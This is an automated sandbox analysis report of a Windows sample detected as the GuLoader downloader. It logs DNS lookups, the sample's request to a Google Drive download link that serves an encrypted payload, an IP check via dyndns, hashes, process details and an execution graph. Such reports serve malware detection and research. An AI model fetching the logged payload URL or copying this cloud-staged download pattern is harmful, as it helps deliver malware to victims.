                                                        Jan 11, 2025 01:15:32.456149101 CET192.168.2.101.1.1.10x8365Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                        Jan 11, 2025 01:15:33.639823914 CET192.168.2.101.1.1.10x47f0Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                        Jan 11, 2025 01:15:37.717549086 CET192.168.2.101.1.1.10xe616Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 11, 2025 01:15:32.463021040 CET1.1.1.1192.168.2.100x8365No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 01:15:33.647726059 CET1.1.1.1192.168.2.100x47f0No error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 01:15:37.724399090 CET1.1.1.1192.168.2.100xe616No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                        Jan 11, 2025 01:15:37.724399090 CET1.1.1.1192.168.2.100xe616No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 01:15:37.724399090 CET1.1.1.1192.168.2.100xe616No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 01:15:37.724399090 CET1.1.1.1192.168.2.100xe616No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 01:15:37.724399090 CET1.1.1.1192.168.2.100xe616No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                        Jan 11, 2025 01:15:37.724399090 CET1.1.1.1192.168.2.100xe616No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                        • drive.google.com
                                                        • drive.usercontent.google.com
                                                        • checkip.dyndns.org
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.1049710193.122.130.0804216C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 11, 2025 01:15:37.734148026 CET151OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Jan 11, 2025 01:15:41.206324100 CET745INHTTP/1.1 504 Gateway Time-out
                                                        Date: Sat, 11 Jan 2025 00:15:41 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 557
                                                        Connection: keep-alive
                                                        X-Request-ID: 3aaf336c65046926d2cf8fd4c0706e03
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.1049708142.250.181.2384434216C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 00:15:33 UTC216OUTGET /uc?export=download&id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7 HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        2025-01-11 00:15:33 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Sat, 11 Jan 2025 00:15:33 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-XS9reTacrSwMaK-j51ul-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.1049709172.217.16.1934434216C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-11 00:15:34 UTC258OUTGET /download?id=1ic2kfQO2-jYHWvGlUEX35mQZA7m09xr7&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        2025-01-11 00:15:36 UTC4952INHTTP/1.1 200 OK
                                                        X-GUploader-UploadID: AFIdbgRUYtRq6jVze_kXH0nOoyS_1AMIGxKiGDGD-ljE3KYLA2iuOnzJdgEFPUErCxNRy0FEGY4EEAM
                                                        Content-Type: application/octet-stream
                                                        Content-Security-Policy: sandbox
                                                        Content-Security-Policy: default-src 'none'
                                                        Content-Security-Policy: frame-ancestors 'none'
                                                        X-Content-Security-Policy: sandbox
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cross-Origin-Embedder-Policy: require-corp
                                                        Cross-Origin-Resource-Policy: same-site
                                                        X-Content-Type-Options: nosniff
                                                        Content-Disposition: attachment; filename="rHVoEDpSURjslGUowqcymW181.bin"
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Credentials: false
                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                        Accept-Ranges: bytes
                                                        Content-Length: 94272
                                                        Last-Modified: Sun, 08 Dec 2024 19:37:01 GMT
                                                        Date: Sat, 11 Jan 2025 00:15:36 GMT
                                                        Expires: Sat, 11 Jan 2025 00:15:36 GMT
                                                        Cache-Control: private, max-age=0
                                                        X-Goog-Hash: crc32c=IsxT1Q==
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2025-01-11 00:15:36 UTC4952INData Raw: 8c 42 1b 48 4d b8 13 66 0c 48 ea 52 0a 01 d1 fb 13 7a c1 5c 64 ac 0a 71 2f 66 af 06 11 6f 67 d0 2f 8a 7c 22 b9 96 33 e9 5a f4 41 08 3d 30 80 0c 25 c2 5e 88 01 8d ff 97 ad 59 8d b1 a2 81 a9 13 a2 84 7f c2 3c d7 e1 db 2a 39 8b 5b b8 51 da f2 b4 03 e8 c3 1c 5d 0d 9d 2b b2 4d 59 52 54 bd 7a 15 68 27 a3 3d f1 d2 42 0b 2a f9 53 3e dd ca d8 aa 62 3a fb e0 96 c5 17 12 8f 4f 22 e2 a1 da ff 42 92 17 85 88 d2 22 e5 9a a6 6c 82 c3 ce cf c9 9b fb b1 4a e2 9a 87 60 05 88 ef 16 22 5d 8b 25 fa bf b8 fb 56 a2 52 49 2a 2b ab f4 51 f6 74 7e a9 a9 a3 bc 35 ab b0 4d 80 1b 2a 49 d0 21 f2 df 1f 0c 63 79 74 85 64 1f ca 41 9c 6a 9c fe 2e 91 e6 69 17 55 3f 38 b1 b7 dc 7d 0e 2b 92 9c b3 a1 7b fc 39 1d 87 1e 0b b7 ca fb ba 6f 84 9c 17 cc f8 7c c4 a2 c8 d8 24 63 34 ec 63 43 b9 ca 1c
                                                        Data Ascii: BHMfHRz\dq/fog/|"3ZA=0%^Y<*9[Q]+MYRTzh'=B*S>b:O"B"lJ`"]%VRI*+Qt~5M*I!cytdAj.iU?8}+{9o|$c4cC
                                                        2025-01-11 00:15:36 UTC4793INData Raw: 92 4a 8c f9 8a 93 24 80 3a 25 f1 88 4d e4 d4 bd 46 fd db 57 5e 33 fd 4c 18 ab 73 37 83 b4 b2 4f 9f c9 73 5b d0 0c 49 be b4 3c d4 34 b6 78 ec e6 de ea 36 5d c2 84 29 ff 13 3c 17 84 74 ef 71 99 86 11 0d 8f be c8 58 92 b2 0a 21 28 db 00 e6 23 01 81 1c df 8f ea cd 30 08 a5 c7 5f 3c 65 05 8f bf 19 1f 83 fe c0 0e b7 20 6d 50 e4 6c 3c 27 9d 90 cc d2 e6 cd bf 94 08 94 6d 38 67 58 34 b8 3b 51 89 6c 12 89 e0 cc 56 bd ea cd 46 46 12 11 bd 54 6c 35 8f 33 d3 7e 4b dd 61 25 78 6b ba 44 06 2a da 9d cb 7f 90 77 25 df 7d b9 b2 0c 13 07 ec 94 48 c7 ed 4d 48 6c 66 5e 19 d7 d7 53 6b c5 d0 c9 bd da a0 71 41 e9 61 86 91 62 a9 83 67 a5 b7 6e ab b1 16 a9 90 44 69 64 04 67 1f 94 a2 df 6e 9d 30 ff 6d cd b7 13 2e 64 8f 7c 64 a1 b3 99 d6 5b 43 34 6c 05 51 78 13 87 f5 6a a8 d4 fe 56
                                                        Data Ascii: J$:%MFW^3Ls7Os[I<4x6])<tqX!(#0_<e mPl<'m8gX4;QlVFFTl53~Ka%xkD*w%}HMHlf^SkqAabgnDidgn0m.d|d[C4lQxjV
                                                        2025-01-11 00:15:36 UTC1325INData Raw: d6 8d cc 60 fa 9b 29 51 9f 7d d7 40 d7 29 60 97 09 f8 4d 3c 0a 2f a5 86 eb 80 49 fd 59 ab 1d c1 7c 71 9b 4e f4 74 fc 89 c5 de b7 39 27 c4 4f 6e e9 1b 9b 6a 7b c5 18 07 30 1b 30 1d fc 3c fa 26 ed 59 eb 18 1a 13 1b 34 ef 94 40 90 bd 2c 11 c6 ec 2c 14 e5 17 1e 42 b0 c7 06 d5 2b 98 d2 cf 1c 6c ff 48 5b f1 6e b5 3b 98 7b 71 bd 31 4c 3e c6 d0 76 aa 11 35 a3 53 e7 48 ba 03 a4 f7 d5 08 5d 32 17 74 f8 13 36 b4 54 23 b8 25 99 bb 58 16 96 0d 4d 70 e8 1c c0 43 e9 cb 76 ac b8 61 9e 6b 4a 05 b0 52 1a 2e a1 a0 4c 0c 90 4c 2a ba ab 41 89 ff 9f 09 ea e6 89 e2 77 8f b4 f2 16 a1 51 37 20 69 37 53 e9 63 b2 a6 7e bf 43 bd 4f 1b 7d ef eb 66 ad 90 08 f9 18 e2 2b f4 5e 4d 6b 77 6b 8b 99 ed 70 62 06 14 6a 3c e9 93 b1 dc cf 7b 50 3c f6 f4 7d 14 a1 c5 55 e6 9f 1b 1d d9 ad 04 9b 9f
                                                        Data Ascii: `)Q}@)`M</IY|qNt9'Onj{00<&Y4@,,B+lH[n;{q1L>v5SH]2t6T#%XMpCvakJR.LL*AwQ7 i7Sc~CO}f+^Mkwkpbj<{P<}U
                                                        2025-01-11 00:15:36 UTC1390INData Raw: 7a 30 d4 d9 91 52 76 fc 63 ab f6 8b c0 23 7b 99 2c d9 54 25 84 32 fb 38 62 e5 d0 96 54 35 61 c3 74 86 ed 28 11 ad 2b ed 0c c4 1a d1 c5 1f fd 1b 3e 8b be 93 15 1c 3f 9e fd 7b e9 61 39 40 de 4b 71 70 6e 1f 4e 16 fe 3e 85 7a e9 71 a1 30 cb 19 9b 31 92 d8 44 90 ab 2e 39 31 ec 2c 1e e5 22 0d 47 07 56 d8 da 1d 9a 2c c8 10 6e 84 15 34 f0 6a cb 62 98 a7 7b be 67 4c 3e e6 db 60 b9 15 26 a7 62 ea 30 56 45 ab f7 d1 20 8e 29 27 74 f8 59 35 b6 2f 45 b8 25 8c c5 78 cf 96 07 6f 2f f2 91 f5 48 ee d9 56 ab cf 87 86 69 41 ed 95 45 6c e0 67 a0 3c a4 b5 54 58 ba c6 09 f9 5d be 6e cb f8 9f e8 2f 79 b8 e6 0f a9 43 a9 b7 78 31 7e c1 77 b7 30 7e bf 4d e7 a6 0d 7d 95 84 b9 ad 92 79 17 3d f5 51 54 0d 4d 61 0f ae c9 99 9d 15 b0 0f 07 67 8f cb a7 c2 00 b4 37 5a 4e 16 cb ae 64 ce 10
                                                        Data Ascii: z0Rvc#{,T%28bT5at(+>?{a9@KqpnN>zq01D.91,"GV,n4jb{gL>`&b0VE )'tY5/E%xo/HViAElg<TX]n/yCx1~w0~M}y=QTMag7ZNd
                                                        2025-01-11 00:15:36 UTC1390INData Raw: e7 a4 65 ea 11 9b 6f 56 a6 71 7a 77 08 3c 0f ed 33 b9 82 ef 59 ef 21 c7 02 16 a4 81 d6 51 9e ca c2 11 ec e6 3f 1b e7 29 0d 4c 58 97 1c d5 7f f7 39 de 1c 64 93 d8 34 1e 6a cb 62 8b 6b 6a 9b 17 18 24 cc aa 58 f7 15 24 ad 6c fb 5b d0 5c d7 07 d1 20 84 21 05 6f ea 7c c7 b6 2f 63 0f 36 8e d4 18 01 4c 10 b3 a9 b1 1c ca 49 fd cc 65 ae a8 3f 71 6c 31 3f a3 44 0f 14 63 b4 5a 17 83 23 d8 b8 d0 03 af ee 8f 61 28 c6 59 e8 5f db 4a f3 0f ba 48 33 35 61 20 66 c8 67 df fd 66 bf 6c 90 9c 0c 6e fd eb 77 be 85 a9 a6 02 f4 3c 91 35 7b 69 7d 43 ce 8d fc 61 fe 10 27 5c 3a ff ab ad c5 25 28 2f 13 fc cd ba 05 ba 5e 4a db 61 30 0b 27 b7 1f 90 89 e3 3d f8 af 82 ef c5 97 9a 7f 4e d0 52 3c fa 50 1a cb 35 27 d6 ab e4 d4 3f c2 b2 03 00 94 12 b6 6d bb 97 54 50 30 12 5f df 66 92 a1 c2
                                                        Data Ascii: eoVqzw<3Y!Q?)LX9d4jbkj$X$l[\ !o|/c6LIe?ql1?DcZ#a(Y_JH35a fgflnw<5{i}Ca'\:%(/^Ja0'=NR<P5'?mTP0_f
                                                        2025-01-11 00:15:36 UTC1390INData Raw: e7 42 4a 68 98 71 6d 6b 64 47 39 e0 de 67 b3 3e 21 a7 69 e0 61 c1 43 8e f7 d1 3b be 34 17 6c f9 13 36 87 2f 69 a9 25 9f b7 c3 0d 96 77 4d 6a e8 1c c0 43 f8 55 2a bd bd 4c 9f 6e 19 b7 b0 52 14 10 8c a1 41 0f 83 49 3b bd fc 00 9d ec 9f 77 81 3b 89 e8 5f db c6 10 07 ad 29 3a 55 81 31 7f ee 66 e1 14 7e bf 4d bd 67 1b 7d ef f8 60 bc 94 1c 49 18 e2 25 99 05 66 28 6c 4b b0 e7 ed 7a 65 27 3d 6d 2d e4 ac b5 cf bd 43 cd 3c f2 dd bd 1e b0 c5 3a 1b 9f 31 17 ca bd 25 9a 8c fc 30 e5 9f 88 e3 de e5 5d 86 4f da 45 42 13 43 04 d0 4e 36 cc 3a c6 38 55 c2 b8 1a 13 85 0c a4 63 9b 3d d4 50 3a 30 02 d2 77 95 9f 64 ba 0e ad ad f8 b1 76 56 96 34 8e c0 c0 0e 89 af ef 3d 8f 5a 99 fb 90 63 a2 d1 ba 14 65 67 04 df e3 01 04 09 35 3e 9c 49 a8 be ec db e6 21 4d 5b a6 7a 9e 9b 1a b8 3a
                                                        Data Ascii: BJhqmkdG9g>!iaC;4l6/i%wMjCU*LnRAI;w;_):U1f~Mg}`I%f(lKze'=m-C<:1%0]OEBCN6:8Uc=P:0wdvV4=Zceg5>I!M[z:
                                                        2025-01-11 00:15:36 UTC1390INData Raw: ea 4c 93 69 5b 4e b0 52 0e 06 72 a0 08 06 90 4d 31 88 d4 09 f5 fe 9b 77 8a e6 89 f9 5f c4 a8 da c4 ad 59 2e 54 58 2c 7f 94 49 87 ee 7e b5 4d 95 9a 33 85 e5 eb 6c a6 95 4a f3 19 e2 2f 8c 7e 9a 6b 7d 45 d3 91 9f 20 73 0f 77 02 ff ee bf ba f8 bc 58 83 3c f2 da b9 ce b2 c9 43 f5 98 09 0a d8 b6 34 99 8e f7 53 81 af 91 82 bb 5f a3 86 49 dd 5a 3c eb 31 7a c6 21 46 a2 ef cc 10 39 d1 bc 18 0e 82 7e 38 6e 93 22 3b 85 3a 3a 17 cc 63 89 b7 fc f7 19 bc a3 9e a8 67 5e bb 5b 85 f9 cb 7a 98 a5 80 38 e1 5b 93 94 9f 62 7e d3 1c e9 7e bd 15 16 fd c6 80 44 cb 3f 8e 50 be bc e1 34 e0 24 4e c4 c4 4d 52 9b d6 b8 3a a9 e2 61 f2 cc e2 b1 5d f6 08 3f cf 25 34 30 fe 4a 59 b0 71 66 50 57 f5 e7 8f 80 0e d6 99 8f 49 b5 61 f0 03 5c 8a a9 ad 03 20 16 35 fa 04 59 cb cb bd 47 af c5 6a 5f
                                                        Data Ascii: Li[NRrM1w_Y.TX,I~M3lJ/~k}E swX<C4S_IZ<1z!F9~8n";::cg^[z8[b~~D?P4$NMR:a]?%40JYqfPWIa\ 5YGj_
                                                        2025-01-11 00:15:36 UTC1390INData Raw: e0 ef a9 18 92 40 5f 0d 4d 6d 6e 46 ce 9c c5 e9 6f 0f 01 7e 25 ff b7 90 9d b2 1f 53 3d f2 d6 c1 10 a0 cf 5f 89 9a 30 1d d3 9e a0 91 9f f6 32 e0 a2 98 e6 2a 8b b0 8c 5e da 44 d3 ed 50 0f cb 2a 1a db 12 66 10 3f c8 a9 15 70 da 0c a4 78 82 5b 7c c5 3a 3a 17 cc 63 98 b2 d4 4f 39 bc 8d 27 a0 76 5c 9f 09 84 a3 54 67 98 df 80 e9 e0 5b 9f 94 c5 63 7e d3 1c c1 7e bd 15 16 f1 d7 98 54 47 dc 98 5a df a0 df 4b e1 37 4f c3 31 62 55 b6 0e 5a 3f a3 83 72 b5 12 e2 b1 5d f1 ff 14 05 36 38 27 e1 63 14 ad fc 72 70 57 dc 68 99 f2 e2 ca 88 f8 99 0c 6a f9 d1 16 47 db 81 10 4f 39 97 df 17 60 73 69 98 5b ce 86 7f 4e 96 47 15 c9 1c fd 99 77 45 ed e1 35 9a 6b 0f dc 3d 4b da 09 f2 4b 59 77 27 51 c1 fb 6e 68 a8 44 6f d5 45 1d 59 ec 12 04 ce 09 7a b3 5b 08 2f e6 80 66 a6 a1 88 a2 50
                                                        Data Ascii: @_MmnFo~%S=_02*^DP*f?px[|::cO9'v\Tg[c~~TGZK7O1bUZ?r]68'crpWhjGO9`si[NGwE5k=KKYw'QnhDoEYz[/fP
                                                        2025-01-11 00:15:36 UTC1390INData Raw: 3d 32 57 2d 9c 55 2c 5b 21 36 c7 2c 32 13 2e c7 ca f2 1a 85 7c b2 5a 12 52 54 5a 2c c4 12 80 75 94 a3 d8 48 54 a1 28 b2 a0 76 57 b2 0e f1 37 dc 7b e8 0d ca 2b e9 f9 bc e3 e8 4f 6b d9 44 df 5b a4 02 01 56 f2 93 22 73 2b 9d 2a 0d 93 ec db e4 95 60 c9 bd aa 66 b3 0c 1a 12 03 f3 64 97 80 ef cf 58 e7 01 13 4b 28 1c 78 ed 4f 53 30 7e 4d 70 53 dd 4d 9e 87 13 08 9b 8f 2a 2e 6c f6 4d d3 a1 56 52 05 4f 97 25 df 26 42 77 cb b7 52 b2 c0 42 1c e6 e5 3a 0c 0d f8 11 13 45 9f cf 15 9a 1b ad e7 9d 4b da 54 e0 46 27 12 26 51 c5 fa 63 40 e6 00 6f df c4 09 69 e8 16 78 cf 18 7d 97 8d 1b 39 f7 98 6b 88 47 68 5c a5 6a 5e 38 70 43 84 2d 31 ac d9 23 ab 01 1f 62 03 b8 d9 1e 03 ab 5a 44 0a e5 fb 2b f4 28 33 c8 a0 84 1a e4 44 9b 67 1b 9d 7a df b8 54 88 fe c2 18 a6 0c 97 34 22 88 1b
                                                        Data Ascii: =2W-U,[!6,2.|ZRTZ,uHT(vW7{+OkD[V"s+*`fdXK(xOS0~MpSM*.lMVRO%&BwRB:EKTF'&Qc@oix}9kGh\j^8pC-1#bZD+(3DgzT4"
                                                        2025-01-11 00:15:36 UTC1390INData Raw: 99 fb 44 73 5b f1 07 7d 7e b7 00 0b f4 ff db 50 35 34 43 5a af 9c b6 d6 e1 37 45 d5 cf 61 57 b3 7c b8 6d a2 f3 64 f7 92 e2 b1 47 e7 01 17 1e 25 34 37 f6 7f 5d b0 0d 4c 70 57 ee 4d 8f 91 04 c1 94 a0 e3 29 7d fa 01 aa 7a a9 dd 2d 01 49 35 f0 04 71 71 e3 45 41 bc ca 61 49 df a3 31 d2 0d fe 48 85 59 9f c9 19 92 69 f7 e8 9d 3b b5 d1 e1 46 21 5e 2f 3e 16 ea 63 46 f1 9e 7c d9 d3 01 5e d4 01 05 ce 18 75 b5 8a 69 40 eb 87 07 cf 4a 68 5c a9 15 65 0a 77 41 d2 7f 31 dc bc fc ab 07 31 89 07 b0 c2 12 76 0e 00 45 7a 8a 28 58 23 2e 20 cb bd 89 40 2d 58 9b 11 67 47 6b d7 92 31 86 b9 12 19 a6 00 ef ea 30 8e 07 ba 4f 1b 5e 61 9c 80 ce 97 4d 84 0b bf b1 72 91 db 34 f4 ab 18 9e 98 5b 3f 66 61 99 66 90 d1 29 fc 52 8a 2b 2a 9e a9 5f e4 de a8 67 5e 4e 57 54 35 30 45 18 a2 5f 1b
                                                        Data Ascii: Ds[}~P54CZ7EaW|mdG%47]LpWM)}z-I5qqEAaI1HYi;F!^/>cF|^ui@Jh\ewA11vEz(X#. @-XgGk10O^aMr4[?faf)R+*_g^NWT50E_


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:19:14:54
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\4AMVusDMPP.exe"
                                                        Imagebase:0x400000
                                                        File size:997'399 bytes
                                                        MD5 hash:ED6F1C14E085E4FBC7C47F894F2140B9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1732921065.0000000003541000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:19:15:23
                                                        Start date:10/01/2025
                                                        Path:C:\Users\user\Desktop\4AMVusDMPP.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\4AMVusDMPP.exe"
                                                        Imagebase:0x400000
                                                        File size:997'399 bytes
                                                        MD5 hash:ED6F1C14E085E4FBC7C47F894F2140B9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:19:15:41
                                                        Start date:10/01/2025
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 2536
                                                        Imagebase:0x3f0000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:20%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:19.9%
                                                          Total number of Nodes:1570
                                                          Total number of Limit Nodes:39
                                                          execution_graph 4127 401941 4128 401943 4127->4128 4133 402c41 4128->4133 4134 402c4d 4133->4134 4179 40640a 4134->4179 4137 401948 4139 405afa 4137->4139 4221 405dc5 4139->4221 4142 405b22 DeleteFileW 4144 401951 4142->4144 4143 405b39 4145 405c64 4143->4145 4235 4063e8 lstrcpynW 4143->4235 4145->4144 4264 40672b FindFirstFileW 4145->4264 4147 405b5f 4148 405b72 4147->4148 4149 405b65 lstrcatW 4147->4149 4236 405d09 lstrlenW 4148->4236 4150 405b78 4149->4150 4153 405b88 lstrcatW 4150->4153 4154 405b7e 4150->4154 4156 405b93 lstrlenW FindFirstFileW 4153->4156 4154->4153 4154->4156 4158 405c59 4156->4158 4168 405bb5 4156->4168 4157 405c82 4267 405cbd lstrlenW CharPrevW 4157->4267 4158->4145 4161 405c3c FindNextFileW 4165 405c52 FindClose 4161->4165 4161->4168 4162 405ab2 5 API calls 4164 405c94 4162->4164 4166 405c98 4164->4166 4167 405cae 4164->4167 4165->4158 4166->4144 4171 405450 24 API calls 4166->4171 4170 405450 24 API calls 4167->4170 4168->4161 4172 405afa 60 API calls 4168->4172 4175 405450 24 API calls 4168->4175 4240 4063e8 lstrcpynW 4168->4240 4241 405ab2 4168->4241 4249 405450 4168->4249 4260 4061ae MoveFileExW 4168->4260 4170->4144 4173 405ca5 4171->4173 4172->4168 4174 4061ae 36 API calls 4173->4174 4176 405cac 4174->4176 4175->4161 4176->4144 4194 406417 4179->4194 4180 406662 4181 402c6e 4180->4181 4212 4063e8 lstrcpynW 4180->4212 4181->4137 4196 40667c 4181->4196 4183 406630 lstrlenW 4183->4194 4184 40640a 10 API calls 4184->4183 4188 406545 GetSystemDirectoryW 4188->4194 4189 406558 GetWindowsDirectoryW 4189->4194 4190 40667c 5 API calls 4190->4194 4191 40640a 10 API calls 4191->4194 4192 4065d3 lstrcatW 4192->4194 4193 40658c SHGetSpecialFolderLocation 4193->4194 4195 4065a4 SHGetPathFromIDListW CoTaskMemFree 4193->4195 4194->4180 4194->4183 4194->4184 4194->4188 4194->4189 4194->4190 4194->4191 4194->4192 4194->4193 4205 